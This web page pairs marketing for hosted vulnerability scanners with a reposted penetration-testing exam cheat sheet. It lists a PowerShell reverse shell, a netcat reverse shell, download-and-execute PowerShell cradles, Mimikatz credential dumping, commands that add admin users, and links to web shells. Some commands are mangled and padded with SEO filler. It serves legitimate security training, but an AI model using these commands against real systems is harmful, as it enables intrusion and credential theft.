Nikto Cheat Sheet

Posted on  by

Proactively hunt for security weakness. Pivot from attack surface discovery to vulnerability identification.
  1. Nikto Cheat Sheet Pdf
  2. Nikto Cheat Sheet Template
  3. Nikto Cheat Sheet Download
Find security holes with trusted open source tools. Get access to tools used by penetration testers and security professionals around the world.

Installation $ sudo apt-get install nikto nikto cheat sheet Standard command to scan websites nikto –host (web url host name) –(http port number ) Scan options Nikto –h (Hostname/IP address) Scan a host Nikto -h -port (Port Number1),(Port Number2) Scan host targeting specific ports Nikto -h (Hostname) -maxtime (seconds) Define maximum scan time. Nikto is a perl based security testing tool and this means it will run on most operating systems with the necessary Perl interpreter installed. We will guide you through using it on Ubuntu Linux, basically because it is our operating system of choice and it just works.

Hunt vulnerabilities from the attackers perspective. Simulating real world security events, testing vulnerabilities and incident response.
Discover the attack surface with tools and open source intelligence. Protect your network with improved visibility.
Sheet
Over 1 million scans performed last year. Our vulnerability scanners have been launching packets since 2007.
Fixing security issues requires you find them. Identify the issue, re-mediate the risk and test again to be sure.
Fast servers optimized for vulnerability scanning across the Internet. No maintenance or installation required.

Saving time. Minimizing headaches.

Discover why thousands of customers use hackertarget.comto monitor and detect vulnerabilities using our online vulnerability scanners. The suite of tools are used daily by systems administrators, network engineers, security analysts and IT service providers.
7 day full refund available if you are not getting immediate value!
Launch vulnerability scans with a simple form. Select required options and wait for your results.
Being a hosted service there is nothing to install or maintain. Scan when you want from anywhere.
Schedule OpenVAS and Nmap for ongoing vulnerability detection and firewall monitoring.
Find forgotten assets and poorly maintained endpoints.
Visibility for Red and Blue Teams.
We have 13 online vulnerability scanners for testing different areas of the security assessment cycle; including information gathering, application discovery, network mapping and vulnerability discovery. In addition are another 15 Free Network and IP Tools.
Test open ports with our hosted Nmap online port scanner. With the ability to scan all ports and complete net blocks the port scanner is one of our most popular scans.
OpenVAS is a powerful open source vulnerability scanner that will perform thousands of checks against a system looking for known security vulnerabilities.
Now available is access to Zmap a very fast port scanner. Sweep multiple class B network ranges for open ports. The 'Internet' knows whats on your perimeter, do you?
WhatWeb & Wappalyzer web service reconnaissance from HTTP headers and source HTML. Determine technologies and scripts in use.
Vulnerable web scripts, configuration errors and web server vulnerabilities can all be detected with this online version of the Nikto Web Scanner.
Passively check SharePoint portals for patch level and operating system. Discover security related issues that will inform any assessment.
The most popular content management system in the world is also the most attacked. Get a FREE WordPress security check and find installed plugins.
Joomla is another popular CMS well known for its many and varied plugins and themes. Use our online scanner to detect security problems with a Joomla installation.
Another one of our content management security testing scanners; the Drupal security scan discovers security related issues focused on a Drupal installation.
Quickly analyze TLS/SSL with this SSL Scan. Find weak encryption and certificate details. Uses SSLyze and Nmap NSE scripts.
Attack surface discovery tool that passively finds Internet assets. Including IP addresses, subdomains and listening services.
FREE Information gathering tool that focuses on a single web server and finds virtual hosts on the server. It will then perform malware and reputation checks against the discovered websites.

Our Professional Services Team are ready to do the testing and reporting for you. When you need a trusted third party for yourexternal vulnerability assessment.
We are focused on providing maximum value for our clients. Backed by years of experience in penetration testing and vulnerability analysis let us give you a leg up and take your security to the next level.

Forked from sinfulz “JustTryHarder” is his “cheat sheet which will aid you through the PWK course & the OSCP Exam.”
So here:“

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Disclaimer: none of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info:I have obtained a lot of this info through other Github repos, blogs, sites and more.I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz

Active Directory & Domain Controllers

  • WIP

BOF (WIP)

(Bad Characters: 0x00, 0x0A)

  • Fuzzing
  • Finding eip position
  • Finding bad chars
  • Locating jmp esp
  • Generating payload with msfvenom
  • Getting reverse shell with netcat

DNS - Zone Transfers

  • host -t axfr HTB.local 10.10.10.10
  • host -l HTB.local 10.10.10.10
  • host -l
  • dig @
  • churrasco -d “net localgroup administrators /add'
  • churrasco -d “NET LOCALGROUP “Remote Desktop Users” /ADD'

Post Exploitation

  1. Mimikatz.exe (run it)
  2. privilege::debug
  3. sekurlsa::logonpasswords

Port Forwarding

#Chisel

#Plink

#SSH

  • ssh root@10.10.10.10 -R 1234:127.0.0.1:1234

Port Scanning

#TCP

  • reconnoitre -t 10.10.10.10 -o . –services –quick –hostnames
  • nmap -vvv -sC -sV -p- –min-rate 2000 10.10.10.10
  • nmap -sT -p 22,80,110 -A
  • nmap -p- -iL ips.txt > TCP_Ports.txt

#UDP (can take hours so maybe netstat is a better alternative)

  • nmap -sU –top-ports 10000
  • nmap -sT -sU -p 22,80,110 -A
  • nmap -sT -sU -p- –min-rate 2000
  • nmap -p- -sU -iL ips.txt > udp.txt
  • nmap -sU -sV -iL ips.txt > alludpports.txt

#SNMPnmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)

#SSHnmap –script ssh2-enum-algos -iL ips.txt > SSH.txt

#SSLnmap -v -v –script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

PowerShell

  • powershell -ExecutionPolicy ByPass -File script.ps1

Pivoting

  • sshuttle -r user@10.10.10.10 10.1.1.0/24

Remote Desktop

rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/

Reverse Shells

#Linux

  • http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  • https://awansec.com/reverse-shell.html

#Windows

  • https://github.com/Dhayalanb/windows-php-reverse-shell
  • nc [YourIPaddr] [port] –e cmd.exe

Shell Upgrading

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

SQL Injection (SQLmap)

  • sqlmap -u “http://example.com/test.php?test=test” –level=5 –risk=3 –batch

Python

  1. python -c ‘import pty;spawn(“/bin/bash”);’or
  2. python3 -c ‘import pty;spawn(“/bin/bash”);’
  3. In reverse shell:```python -c ‘import pty; pty.spawn(“/bin/bash”)’Ctrl-Z
  • In Kali
  1. stty raw -echo
  2. fg
  • In reverse shell
    1. reset (sometimes optional)
    2. export SHELL=bash
    3. export TERM=xterm-256color
    4. stty rows columns (optional)(Sometimes the command will need to be executed: export TERM=xterm)```

Using socat

Perl

  1. perl -e ‘exec “/bin/sh”;’
  2. perl: exec “/bin/sh”;

Bash

/bin/sh -i

Show listening ports

  • Linux netstat syntax
    1. netstat -tulpngrep LISTEN
  • FreeBSD/MacOS X netstat syntax
    1. netstat -anp tcpgrep LISTEN
    2. netstat -anp udpgrep LISTEN

  • OpenBSD netstat syntax

    1. netstat -na -f inetgrep LISTEN
    2. netstat -natgrep LISTEN
  • Nmap scan syntax
    1. sudo nmap -sT -O localhost
    2. sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
    3. sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##

SMB - Enumeration

  • https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
  • smbmap -H 10.10.10.10
  • smbclient -L 10.0.0.10
  • smbclient //10.10.10.10/share$

SMB - Impacket

  • Impacket’s PSEXEC (After creating a remote port fwd)/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10

Password: (password)

[*] Trying protocol 445/SMB…

  • Impacket’s SMBServer (For File Transfer)
    1. cd /usr/share/windows-binaries
    2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
    3. 10.10.10.10amimikatz.exe

SMTP Enumeration

https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

VMware (not going full screen)

  • systemctl restart open-vm-tools.service

Web Servers:

  • python -m SimpleHTTPServer 80
  • python3 -m http.server 80
  • ngrok http 80

Web Scanning:

#Web Scanning with extensions

#HTTP

  • gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
  • gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

#HTTPS

  • gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69(in some cases –wildcard will need to be used instead of -k)

#Nikto

  • nikto -h 10.10.10.10 -p 80
Sheet

#Nikto HTTPS

  • nikto -h 10.10.10.10. -p 443

WFuzz

Nikto cheat sheet pdf
  • wfuzz -u http://google.com/login.php?username=admin&password=FUZZ -w /usr/share/wordlists/rockyou.txt
  • wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt

Web Shells

  • https://github.com/Arrexel/phpbash
  • https://github.com/flozz/p0wny-shell

WordPress

  • https://forum.top-hat-sec.com/index.php?topic=5758.0

Windows Framework / Powershell

bypass PowerShell execution policy```PowerShell -Exec Bypass

powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.1.3.40’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

Nikto Cheat Sheet Pdf

echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’) | powershell -noprofile -

IEX(New-object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’)

powershell -nop -exec bypass IEX “(New-Object Net.WebClient).DownloadString(‘http://10.10.14.x/Whatever.ps1’); Invoke-Whatever”

xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/Nishang-ReverseShell.ps1')```Windows Post Exploitation Commands—————-

  • WMIC USERACCOUNT LIST BRIEF
  • net user
  • net localgroup Users
  • net localgroup Administrators
  • net user USERNAME NEWPASS /add
  • net user “USER NAME” NEWPASS /add
  • net localgroup administrators USERNAME /add

Writeable Directories(Work in progress)—————-

  • C:WindowsSystem32SpoolDriverscolor
  • C:windowstracing
  • C:windowstasks
  • C:windowssystem32microsoftcryptorsamachinekeys

Nikto Cheat Sheet Template

  • To find World Writeable Directories in Linux use the command:find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print

Nikto Cheat Sheet Download